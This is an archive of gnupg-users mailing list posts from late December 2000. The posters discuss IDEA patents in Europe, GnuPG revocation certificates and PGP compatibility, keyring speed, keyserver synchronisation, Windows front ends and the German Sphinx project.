GPL. My 0.02 euro. [...] Mike -- Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com (The Mad Wizard) | (678) 463-0932 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Mon Dec 25 16:15:41 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 25 Dec 2000 17:15:41 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001224171621.C4668@alcove.wittsend.com> References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> <87ae9l7i68.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <20001224171621.C4668@alcove.wittsend.com> Message-ID: <87y9x4xys2.fsf@deneb.enyo.de> "Michael H. Warfield" writes: > DISTRIBUTE THE DAMN THING FROM EUROPE! > > There is no patent on Idea in Europe. Wrong, there is a patent, see: http://l2.espacenet.com/dips/viewer?PN=EP0482154&CY=de&LG=de&DB=EPD -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From mhw@wittsend.com Tue Dec 26 00:33:21 2000 From: mhw@wittsend.com (Michael H. Warfield) Date: Mon, 25 Dec 2000 19:33:21 -0500 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <87y9x4xys2.fsf@deneb.enyo.de>; from fw@deneb.enyo.de on Mon, Dec 25, 2000 at 05:15:41PM +0100 References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> <87ae9l7i68.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <20001224171621.C4668@alcove.wittsend.com> <87y9x4xys2.fsf@deneb.enyo.de> Message-ID: <20001225193321.A2011@alcove.wittsend.com> On Mon, Dec 25, 2000 at 05:15:41PM +0100, Florian Weimer wrote: > "Michael H. Warfield" writes: > > DISTRIBUTE THE DAMN THING FROM EUROPE! > > There is no patent on Idea in Europe. > Wrong, there is a patent, see: > http://l2.espacenet.com/dips/viewer?PN=EP0482154&CY=de&LG=de&DB=EPD Refinement... There are is no patent on Idea in those European countries which have no software patents. Germany is an oddball one where software can be patented if it is reduced to hardware (if I remember the stipulation correctly). Switzerland, obviously, allows software patents. Most other European countries do not. You are correct that the statement "There is no patent on Idea in Europe" is overly general and literally false. The correct statement would have been "There is no patent on Idea in the majority of European countries". I stand corrected. You can still distribute it from Zedz.net along with the other versions of pgp which include and incorporate Idea. It does not violate any patent or the GPL there. Mike -- Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com (The Mad Wizard) | (678) 463-0932 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From johanw@vulcan.xs4all.nl Tue Dec 26 11:17:22 2000 From: johanw@vulcan.xs4all.nl (Johan Wevers) Date: Tue, 26 Dec 2000 12:17:22 +0100 (MET) Subject: GnuPG 1.0.4-1 + IDEA for Windows and more In-Reply-To: <3A461BFD230.3414RICH@mail.dreamscape.com> from Rich at "Dec 24, 2000 10:53:33 am" Message-ID: <200012261117.MAA06640@vulcan.xs4all.nl> Rich wrote: > Well, now that Werner has added the code that allows the Win32 > version to access modules like the IDEA module, why is the version > with it statically compiled even needed? It won't be, after 1.05 is released (assuming 1.05 contains this code). > Once Werner releases 1.05 it's a done deal. Did anyone claim otherwise? > And on another note, I would like to thank Werner for all of his > tireless (and usually thankless) programming efforts and wish him and > everyone else here Happy Holidays! On this point I agree. -- ir. J.C.A. Wevers // Physics and science fiction site: johanw@vulcan.xs4all.nl // http://www.xs4all.nl/~johanw/index.html PGP/GPG public keys at http://www.xs4all.nl/~johanw/pgpkeys.html -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rmartini@iis.com.br Tue Dec 26 23:00:39 2000 From: rmartini@iis.com.br (rmartini@iis.com.br) Date: Tue, 26 Dec 2000 20:00:39 -0300 Subject: Release: GnuPG 1.0.4 for BSD 3.1 Message-ID: <200012262200.eBQM0dC00301@mail.iis.com.br> GnuPG 1.0.4 binaries for BSDI BSD/OS 3.1 ............................................................. *This package was compiled by Gregory Karpinsky (gregory@tiv.net) TIV.NET Inc. (http://tiv.net) *This package is available at "GnuPG for Unix" web site (http://gnupg.unixsecurity.com.br). Email: rmartini@cipsga.org.br Thanks Renato Martini -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rmartini@iis.com.br Wed Dec 27 02:16:38 2000 From: rmartini@iis.com.br (rmartini@iis.com.br) Date: Tue, 26 Dec 2000 23:16:38 -0300 Subject: GnuPG for BSD 4.1 Message-ID: <200012270116.eBR1GcC24365@mail.iis.com.br> GnuPG 1.0.4 binaries for BSDI BSD/OS 4.1 ............................................................. *This package was compiled by Gregory Karpinsky (gregory@tiv.net) TIV.NET Inc. (http://tiv.net) *This package is available at "GnuPG for Unix" web site (http://gnupg.unixsecurity.com.br). Email: rmartini@cipsga.org.br Thanks Renato Martini -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From kai.raven@gmx.de Wed Dec 27 10:15:59 2000 From: kai.raven@gmx.de (Kai Raven) Date: Wed, 27 Dec 2000 11:15:59 +0100 Subject: GPG revocations & PGP Message-ID: <200012271115590773.00447890@mail.gmx.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Hi, i have some difficulties with GPG revocations. I have created a revocation for a test key with "gpg -o file - --gen-revoke key-id" but it is not possible to import this revocation with PGP 6.5.8. PGP warns me, that "The keyring file is corrupt". And the keyserver (pgp5.ai.mit.edu) tells me: "Key block in add request contained no new keys, userid's, or signatures. Your key block contained 1 format errors, which were treated as if the erroneous elements hadn't been part of your submission. The last error was on key 0x00000000: Key block corrupt: signature without key" So i have to export the GPG key, re-import it with PGP to create a revocation, which is accepted by PGP and keyservers? Wouldn't it be better to have a revocation scheme, which is compliant to PGP and all the PGP keyservers? Or do i a mistake? ;-) Ciao Kai -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4-1 (MingW32) - GnuPGshell v1.00 Comment: GnuPG for authentication and privacy in the nets iQEVAwUBOknA3bvhIjV7JRZxAQN2Gwf/WvWKEO+UaHVBtbm1VXjP1YOYNVHIfE9C m+8ILTXxoLx8F++t1gCKLQngUiRPYHHd9+Fpj2fUNeTfSf130E0B0x8dh3rXCNSE YbiY/rP4AaEACTCT/NmfAOGfydPttzF3teilbSHDDMXcyhe1R1h4sHe+r3VeNnBH gsczIqrrC0wbY6GuJjEk54wAFCKexoJNH8yWsW6EvB/8ZktBZI72VzYrDb07qqRl IFD7FioNeT36iE6uHMNDf3ay3TZ1R4+7AvVzAGsFQr4Ja/v6eXifUVfqmq6ADkbN FudoKh4OXX6Lo0J+U6HDkDasSrkFk17NfZFr+G6ITDuLBpYQiwm+xA== =wJW0 -----END PGP SIGNATURE----- -- PGP/GPG [RSA]: 2048-bit Key-ID: 0x7B251671 Homepage: http://beam.to/raven GPG&GnuPGshellinfos: http://home.nexgo.de/kraven/pgp/pgp02aa.html -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Wed Dec 27 12:03:22 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 27 Dec 2000 13:03:22 +0100 Subject: GPG revocations & PGP In-Reply-To: <200012271115590773.00447890@mail.gmx.net> References: <200012271115590773.00447890@mail.gmx.net> Message-ID: <87puienkad.fsf@deneb.enyo.de> "Kai Raven" writes: > I have created a revocation for a test key with "gpg -o file > - --gen-revoke key-id" but it is not possible to import this revocation > with PGP 6.5.8. > PGP warns me, that "The keyring file is corrupt". With --gen-revoke, you have created a bare revocation self-signature. I think PGP requires that the revocation signature is part of an OpenPGP public key (see section 11.1 in RFC 2440). I am not sure if this is a bug in PGP, GnuPG, or the OpenPGP specification. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From support@oeko.net Wed Dec 27 12:49:23 2000 From: support@oeko.net (Toni Mueller) Date: Wed, 27 Dec 2000 13:49:23 +0100 Subject: GnuPG, Winblows, Speed, Key Management Message-ID: <20001227124923.25799.qmail@oak.oeko.net> Hello, I'm currently promoting the use of GnuPG, but have a number of problems doing so. My main reasons to promote GnuPG are that it's both an open-sourced and also non-US encryption package, that it builds on the PGP principles of working w/o a central CA, and because it's able to incorporate newer encryption algorithms and longer key lengths than Sphinx (read "political decision"). - Problem #1: There appears to be no good Winblows interface for it, or at least no good way to hook it into Outlook, IE, Netscape there, what have you. - Problem #2: It's dog slow. I have still less than 300 keys in my keyring (expecting to double that soon), and often find myself interrupting gpg to read the message instead of waiting to verify the signature. Similar things hold for signing or encrypting a message. - Problem #3: I have adjusted gpg to fetch keys on demand from a keyserver. My experience is that these key servers apparently don't synchronize their data sets in a reasonable time frame (weeks!), so I end up fetching keys from varying servers. This is __very__ inconvenient, and of course unsuitable to the casual Winblows user. How do I go about this? - Problem #4: What to do in the face of massive distribution and promotion of Sphinx which is also _not_ interoperable with any kind of PGP? Please Cc me on answers since I'm not on the list. Thank you! Best Regards, --Toni++ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From minton@csc.smsu.edu Wed Dec 27 16:49:42 2000 From: minton@csc.smsu.edu (Brian Minton) Date: Wed, 27 Dec 2000 10:49:42 -0600 Subject: GnuPG, Winblows, Speed, Key Management In-Reply-To: <20001227124923.25799.qmail@oak.oeko.net>; from support@oeko.net on Wed, Dec 27, 2000 at 01:49:23PM +0100 References: <20001227124923.25799.qmail@oak.oeko.net> Message-ID: <20001227104940.B591@aspirin.smsu.edu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, Dec 27, 2000 at 01:49:23PM +0100, Toni Mueller wrote: > - Problem #1: There appears to be no good Winblows interface for it, > or at least no good way to hook it into Outlook, IE, Netscape there, > what have you. I think that is being worked on. for instance, there was some discussion about WinPT (I think that is right) > - Problem #2: It's dog slow. I have still less than 300 keys in my > keyring (expecting to double that soon), and often find myself > interrupting gpg to read the message instead of waiting to verify > the signature. Similar things hold for signing or encrypting a > message. I have more experience with pgp for linux, so this is not completely relevant, but the pgp I have is much slower than gpg. like it will take about 75 seconds to extract a key, all the while running at full cpu usage... > - Problem #3: I have adjusted gpg to fetch keys on demand from a > keyserver. My experience is that these key servers apparently > don't synchronize their data sets in a reasonable time frame > (weeks!), so I end up fetching keys from varying servers. This > is __very__ inconvenient, and of course unsuitable to the casual > Winblows user. How do I go about this? I have encountered this problem too, but it is the same with pgp for windows, as far as I have seen. Theoretically, the keyservers should be more in sync with each other, but in my experience, certserver.pgp.com is the most troublesome. most of the other ones (pgp.mit.edu, wwwkeys.eu.pgp.net, etc.) seem to be better about it. > - Problem #4: What to do in the face of massive distribution and > promotion of Sphinx which is also _not_ interoperable with any > kind of PGP? pardon my ignorance, but I've never heard of Sphinx, what is it? - -- Brian Minton minton@csc.smsu.edu Caution: in case of rapture, this computer will be unoccupied! PGP 0xE177AFF0 fingerprint AB94 E395 78CE 0967 2542 A7B3 178C 3E66 E177 AFF0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6Sh2ep0PPDCS0QgIRAjaTAJwJhkgIKJmfFTfk0FPQ860GBmfSbACeOdeJ 4ujwEtIjNiyqKJBMuvQs3AU= =+56O -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From support@oeko.net Wed Dec 27 17:30:05 2000 From: support@oeko.net (Toni Mueller) Date: Wed, 27 Dec 2000 18:30:05 +0100 Subject: GnuPG, Winblows, Speed, Key Management In-Reply-To: <20001227104940.B591@aspirin.smsu.edu>; from minton@csc.smsu.edu on Wed, Dec 27, 2000 at 10:49:42AM -0600 References: <20001227124923.25799.qmail@oak.oeko.net> <20001227104940.B591@aspirin.smsu.edu> Message-ID: <20001227173005.937.qmail@oak.oeko.net> Hello Brian, thanks for the answer. On Wed, Dec 27, 2000 at 10:49:42AM -0600, Brian Minton wrote: > On Wed, Dec 27, 2000 at 01:49:23PM +0100, Toni Mueller wrote: > > - Problem #1: There appears to be no good Winblows interface for it, > I think that is being worked on. for instance, there was some discussion > about WinPT (I think that is right) I'm just testing out WinPT, but this is no real substitute for a program that just places a new encryption button in the button bar of your favourite program, eg. next to "print message", so users have a minimal learning curve. > > - Problem #2: It's dog slow. I have still less than 300 keys in my > I have more experience with pgp for linux, so this is not completely relevant, I should have been clearer, but I have almost no experience using Winblows, but run almost exclusively on Linux and BSD for myself. I'm talking about my Linux experience here, and about problems I see when advising customers on how to go about encryption. > but the pgp I have is much slower than gpg. like it will take about 75 > seconds to extract a key, all the while running at full cpu usage... A friend of mine has to wait only a few seconds under Linux and with PGP and with some 2k keys, but several minutes using gpg on the same machine and only a few hundred keys. I have only 250-300 keys yet, but - as said - expect that to double (triple?) very soon. > > - Problem #3: I have adjusted gpg to fetch keys on demand from a > > keyserver. My experience is that these key servers apparently ... using wwwkeys.eu.pgp.net which unfortunately has only a few of the Debian keyring or other US-centric keys. > I have encountered this problem too, but it is the same with pgp for windows, Sorry here ... I mixed it up again. The problem for me is only general GPG/PGP usability here. I can expect the average Winblows user to type in a passphrase _once_ a day, but can't expect them to diagnose that a key server is hanging (and not their Exchange), and how to adjust to another key server, or how to skip en/decryption. > as far as I have seen. Theoretically, the keyservers should be more in sync > with each other, but in my experience, certserver.pgp.com is the most I expected this, but in fact have seen keys not distributed across them for some 2 months (which I almost equal to being non-functional). > > - Problem #4: What to do in the face of massive distribution and > > promotion of Sphinx which is also _not_ interoperable with any > > kind of PGP? > > pardon my ignorance, but I've never heard of Sphinx, what is it? http://www.bsi.de/aufgaben/projekte/sphinx/index.htm Especially if you grok German there should be a good deal of material, but there is also some English stuff (also advertised on their homepage www.bsi.de). I'm still not on the list, please Cc me for answers. Thank you! Best Regards, --Toni++ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Wed Dec 27 17:35:15 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Wed, 27 Dec 2000 17:35:15 GMT Subject: GnuPG, Winblows, Speed, Key Management In-Reply-To: <20001227124923.25799.qmail@oak.oeko.net> References: <20001227124923.25799.qmail@oak.oeko.net> Message-ID: <20001227171432.37A4.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Toni Mueller, On 27 December 2000, I received the following message from you regarding "GnuPG, Winblows, Speed, Key Management" TM> Hello, TM> TM> I'm currently promoting the use of GnuPG, but have a number of TM> problems doing so. My main reasons to promote GnuPG are that TM> it's both an open-sourced and also non-US encryption package, TM> that it builds on the PGP principles of working w/o a central TM> CA, and because it's able to incorporate newer encryption TM> algorithms and longer key lengths than Sphinx TM> (read "political decision"). TM> TM> - Problem #1: There appears to be no good Winblows interface for it, TM> or at least no good way to hook it into Outlook, IE, Netscape there, TM> what have you. At present, in Windows, GnuPG is totally a command line program. There are two good interfaces for it that act somewhat like PGPtray, and these are WinPT and GnuPGShell. Using either of these, you can use GnuPG with any Windows MUA. My own Windows MUA, Becky!2, has a GnuPG plug-in which will enable you to interface GnuPG directly from within the program. WinPT is available from: http://www.freenet.de/joesixpack/winpt-en.html GnuPGShell is available from: http://www.bigfoot.com/~rsoft Becky!2 is available from: http://www.rimarts.co.jp the Becky!2 plug-in (BkGnuPG) is available from: http://hp.vector.co.jp/authors/VA023900/gpg-pin/ TM> - Problem #2: It's dog slow. I have still less than 300 keys in my TM> keyring (expecting to double that soon), and often find myself TM> interrupting gpg to read the message instead of waiting to verify TM> the signature. Similar things hold for signing or encrypting a TM> message. I haven't found this (just the opposite) but I use my MUA; if you do that, or one of the interfaces, you will find it works at least as fast as PGP. TM> - Problem #3: I have adjusted gpg to fetch keys on demand from a TM> keyserver. My experience is that these key servers apparently TM> don't synchronize their data sets in a reasonable time frame TM> (weeks!), so I end up fetching keys from varying servers. This TM> is __very__ inconvenient, and of course unsuitable to the casual TM> Winblows user. How do I go about this? WinPT has currently limited keyserver support, but this is being increased in the current version which is in development. Otherwise, use a web based server such as the Esnet server at: http://www.es.net/hypertext/pgp/ alternatively, run PGP 6.5.8 merely for keyserver access. It will show an error warning to the effect of bad parameters, but will (eventually) accept GnuPG keys. Currently, GnuPG has no keyserver support (hopefully to be corrected when GnuPA for Windows becomes available). The PGP servers synchronise very quickly, but GnuPG keys don't seem to be on the default keyservers in PGPtray for some time (as you say). TM> - Problem #4: What to do in the face of massive distribution and TM> promotion of Sphinx which is also _not_ interoperable with any TM> kind of PGP? Excuse my ignorance, but what is Sphinx and is it available for Windows? TM> TM> Please Cc me on answers since I'm not on the list. Thank you! TM> TM> TM> Best Regards, TM> --Toni++ Have done! Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 27 December 2000 17:14:32 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4-1 (MingW32) - GnuPGshell v0.96 Comment: Please use my key ID: 0x99DB10BD iD8DBQE6Sig5LuLY+pnbEL0RArcaAJ4vZX/ZyQ+75HgvUzbVh0u6dGqKWgCcCwer oXp5rtwoQb1ni2T7sSWZz6k= =cb6e -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From trappedvector@crosswinds.net Wed Dec 27 20:49:55 2000 From: trappedvector@crosswinds.net (Martin) Date: Wed, 27 Dec 2000 21:49:55 +0100 Subject: Deleting Keys on Keyservers Message-ID: <20001227214955.A641@crosswinds.net> --TB36FDmn/VVEgNH/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hello everyone, im just curious. Is there a way to delete a key from a keyserver? Are there any ways to edit keys on keyservers at all? B4N mh --=20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - Pain is a thing of the mind. The mind can be controlled. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - --TB36FDmn/VVEgNH/ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) iD8DBQE6SlXzffxhyW5sNDERAjmmAJ4wLJAtEo5JAbXwuEor3hY1J9B+AQCeL/VB ZAZ8Jcwez5s97D7jwv5saVc= =UxIl -----END PGP SIGNATURE----- --TB36FDmn/VVEgNH/-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From minton@csc.smsu.edu Wed Dec 27 23:13:55 2000 From: minton@csc.smsu.edu (Brian Minton) Date: Wed, 27 Dec 2000 17:13:55 -0600 Subject: Deleting Keys on Keyservers In-Reply-To: <20001227214955.A641@crosswinds.net>; from trappedvector@crosswinds.net on Wed, Dec 27, 2000 at 09:49:55PM +0100 References: <20001227214955.A641@crosswinds.net> Message-ID: <20001227171353.A1049@aspirin.smsu.edu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, Dec 27, 2000 at 09:49:55PM +0100, Martin wrote: > > Hello everyone, > > im just curious. Is there a way to delete a key from a keyserver? > Are there any ways to edit keys on keyservers at all? Generally, no. While some keyservers will allow you to email the administrator and ask for your key to be deleted, the chances are that it will have already propogated to the other servers. If all you want to do is add a userid, that will be easy to do. If you want to delete a key or userid, I suggest instead that you revoke it, if you still have the secret key available. Then upload the revoked key to the keyservers. Note that if you are using gpg, you will make a seperate revokation certificate which must be imported before sending it to the keyservers (in the case of revoking the entire key). - -- Brian Minton minton@csc.smsu.edu Caution: in case of rapture, this computer will be unoccupied! PGP 0xE177AFF0 fingerprint AB94 E395 78CE 0967 2542 A7B3 178C 3E66 E177 AFF0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6Snesp0PPDCS0QgIRAhxFAKCYLGcUmudlGe6oCwMr3hPEeIL2UACeMVGF aiTFmC68pcNdNRazWOGM6Bc= =VUyL -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From peter@palfrader.org Thu Dec 28 00:45:35 2000 From: peter@palfrader.org (Peter Palfrader) Date: Thu, 28 Dec 2000 01:45:35 +0100 Subject: Deleting Keys on Keyservers In-Reply-To: <20001227214955.A641@crosswinds.net>; from trappedvector@crosswinds.net on Wed, Dec 27, 2000 at 21:49:55 +0100 References: <20001227214955.A641@crosswinds.net> Message-ID: <20001228014535.A9977@marvin.palfrader.org> Hi Martin! On Wed, 27 Dec 2000, Martin wrote: > im just curious. Is there a way to delete a key from a keyserver? no. > Are there any ways to edit keys on keyservers at all? You can update a key by reuploading it to the server. The server will then merge your new upload into its keyring. HTH yours, peter -- PGP signed and encrypted messages preferred. http://www.palfrader.org/ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From afx@atsec.com Thu Dec 28 09:53:08 2000 From: afx@atsec.com (Andreas Siegert) Date: Thu, 28 Dec 2000 10:53:08 +0100 Subject: Sphinx In-Reply-To: <20001227104940.B591@aspirin.smsu.edu>; from minton@csc.smsu.edu on Wed, Dec 27, 2000 at 10:49:42AM -0600 References: <20001227124923.25799.qmail@oak.oeko.net> <20001227104940.B591@aspirin.smsu.edu> Message-ID: <20001228105308.A1226@cray.muc.atsec.de> Quoting Brian Minton (minton@csc.smsu.edu) on Wed, Dec 27, 2000 at 10:49:42AM -0600: > > - Problem #4: What to do in the face of massive distribution and > > promotion of Sphinx which is also _not_ interoperable with any > > kind of PGP? > > pardon my ignorance, but I've never heard of Sphinx, what is it? Massive distribution of Sphinx.... I doubt it. This is a German government thingy (http://www.bsi.de/aufgaben/projekte/sphinx/index.htm). None of my commercial customers has ever heard of it. The beauty of Sphinx is the storage of keys in smart cards. But there is near zero chance to use this on a worldwide heterogeneous customer base. Way too much German signature law centered. If you your key contacts for e-mail are in the German government, there is probably no way around it, but for the rest, I really don't think this is the solution, it is way too Germany centric. cheers afx -- atsec information security GmbH Phone: +49-89-44249830 Steinstrasse 68 Fax: +49-89-44249831 D-81667 Muenchen, Germany WWW: www.atsec.com May the Source be with you! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 28 13:19:25 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 28 Dec 2000 14:19:25 +0100 Subject: GPG revocations & PGP In-Reply-To: <87puienkad.fsf@deneb.enyo.de>; from fw@deneb.enyo.de on Wed, Dec 27, 2000 at 01:03:22PM +0100 References: <200012271115590773.00447890@mail.gmx.net> <87puienkad.fsf@deneb.enyo.de> Message-ID: <20001228141925.F24249@gnupg.de> On Wed, 27 Dec 2000, Florian Weimer wrote: > With --gen-revoke, you have created a bare revocation self-signature. > I think PGP requires that the revocation signature is part of an > OpenPGP public key (see section 11.1 in RFC 2440). It is a feature :-) and some keyservers are patsched to accept this bare revocation. The reason why GnuPG creates a bare revocation signature is for your convenience. Paper is more reliable than a floppy or the hard disk - therefore you should either print or write the revocation cert down, so that you can enter it back (using a normal editor) into a computer from the printout. Doing this for several k of key stuff is not a easy task. IMHO it is easier to take the revocation signature and import it using GnuPG and then send the entire key to the keyserver. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 28 13:37:36 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 28 Dec 2000 14:37:36 +0100 Subject: GnuPG, Winblows, Speed, Key Management In-Reply-To: <20001227124923.25799.qmail@oak.oeko.net>; from support@oeko.net on Wed, Dec 27, 2000 at 01:49:23PM +0100 References: <20001227124923.25799.qmail@oak.oeko.net> Message-ID: <20001228143736.G24249@gnupg.de> On Wed, 27 Dec 2000, Toni Mueller wrote: > - Problem #1: There appears to be no good Winblows interface for it, > or at least no good way to hook it into Outlook, IE, Netscape there, > what have you. All I can say is that we are really working on it. > - Problem #2: It's dog slow. I have still less than 300 keys in my > keyring (expecting to double that soon), and often find myself > interrupting gpg to read the message instead of waiting to verify > the signature. Similar things hold for signing or encrypting a > message. The problem with the slowness is not related directly to crypto but due to 2 things: 1) Sequentiell parsing of the keyring, which is a minor issue for a few hundred keys and PGP does the same. 2) The way gpg calculates the trust which sometimes badly interfere with programs calling gpg. It is slow for the first time you use one key but then it should be faster unless you import new keys. This will be addressed in 1.1 > - Problem #3: I have adjusted gpg to fetch keys on demand from a > keyserver. My experience is that these key servers apparently > don't synchronize their data sets in a reasonable time frame > (weeks!), so I end up fetching keys from varying servers. This > is __very__ inconvenient, and of course unsuitable to the casual > Winblows user. How do I go about this? The keyservers do syncronice but the software used by most keyservers has major problems. Although I don't like to say this, the NAI keyserver (keyserver.pgp.com and wwwkeys.nl.pgp.net) work much better and can now cope with all kinds of OpenPGP keys. There is still some garbage on the keyservers which may give problems for some keys. > - Problem #4: What to do in the face of massive distribution and > promotion of Sphinx which is also _not_ interoperable with any > kind of PGP? Come on, Sphinx[1] is just another governmental try to establish a new infrastructure - Does anybody remember OSI? It is the reason that there used to be no real Internet connection in Germany for a long time. The folks at the University of Dortmund initially gave us TCP/IP access using an guerilla approach. Werner [1] German project for secure communication devoleped on behalf of the BSI and IIRC mainly driver by the need to encrypt the communication between Bonn (old capital) and Berlin. There is no source, it uses hardware and it is not easy to get real info about it due to a "need to know" policy. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 28 13:42:12 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 28 Dec 2000 14:42:12 +0100 Subject: Sphinx In-Reply-To: <20001228105308.A1226@cray.muc.atsec.de>; from afx@atsec.com on Thu, Dec 28, 2000 at 10:53:08AM +0100 References: <20001227124923.25799.qmail@oak.oeko.net> <20001227104940.B591@aspirin.smsu.edu> <20001228105308.A1226@cray.muc.atsec.de> Message-ID: <20001228144212.H24249@gnupg.de> On Thu, 28 Dec 2000, Andreas Siegert wrote: > centered. If you your key contacts for e-mail are in the German government, > there is probably no way around it, but for the rest, I really don't think They will have to use a kind standard too. I doubt than anyone is using EDI which was proposed for document exchange a long time ago. Everbody is exchanging documents by mailing WORD files. Okay, that is far away from being a standard but nevertheless a world wide deployed data format. So there is still hope. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lazarus@overdue.ompages.com Thu Dec 28 15:50:23 2000 From: lazarus@overdue.ompages.com (Lazarus Long) Date: Thu, 28 Dec 2000 15:50:23 +0000 Subject: Deleting Keys on Keyservers In-Reply-To: <20001227214955.A641@crosswinds.net>; from trappedvector@crosswinds.net on Wed, Dec 27, 2000 at 09:49:55PM +0100 References: <20001227214955.A641@crosswinds.net> Message-ID: <20001228155023.A12367@overdue.dhis.net> --BXVAT5kNtrzKuDFl Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Dec 27, 2000 at 09:49:55PM +0100, Martin wrote: > From: Martin =20 > im just curious. Is there a way to delete a key from a keyserver? Nope. Once your key is there, you are hanging out there in the wind for spambots to come harvest for all eternity. --=20 Please (OpenPGP) encrypt all mail whenever possible. Request the following Public Keys for Lazarus Long Type Bits/KeyID Fingerprint DSA KeyID: vvvv vvvv ElGamal: 2048g/41783186 47A0 0929 CD9F B53E 49C0 F06C 560E F574 ED0D F80C --BXVAT5kNtrzKuDFl Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: Now ready for primetime! http://www.gnupg.org iD8DBQE6S2E/Vg71dO0N+AwRAhi5AJ9z/yNYDrEFYtVqCrKC2BdyXWGn8gCgku8E 77KXYrfppopGVlkV3Z6q8Hk= =VX+g -----END PGP SIGNATURE----- --BXVAT5kNtrzKuDFl-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From coolesau@ghettoblaster.heim8.tu-clausthal.de Thu Dec 28 16:19:42 2000 From: coolesau@ghettoblaster.heim8.tu-clausthal.de (Stephan Stapel) Date: Thu, 28 Dec 2000 17:19:42 +0100 (CET) Subject: GnuPG, Winblows, Speed, Key Management In-Reply-To: <20001228143736.G24249@gnupg.de> Message-ID: > All I can say is that we are really working on it. Can you please tell more about that? Stephan -- Archive is at http://lists.gnupg.org - 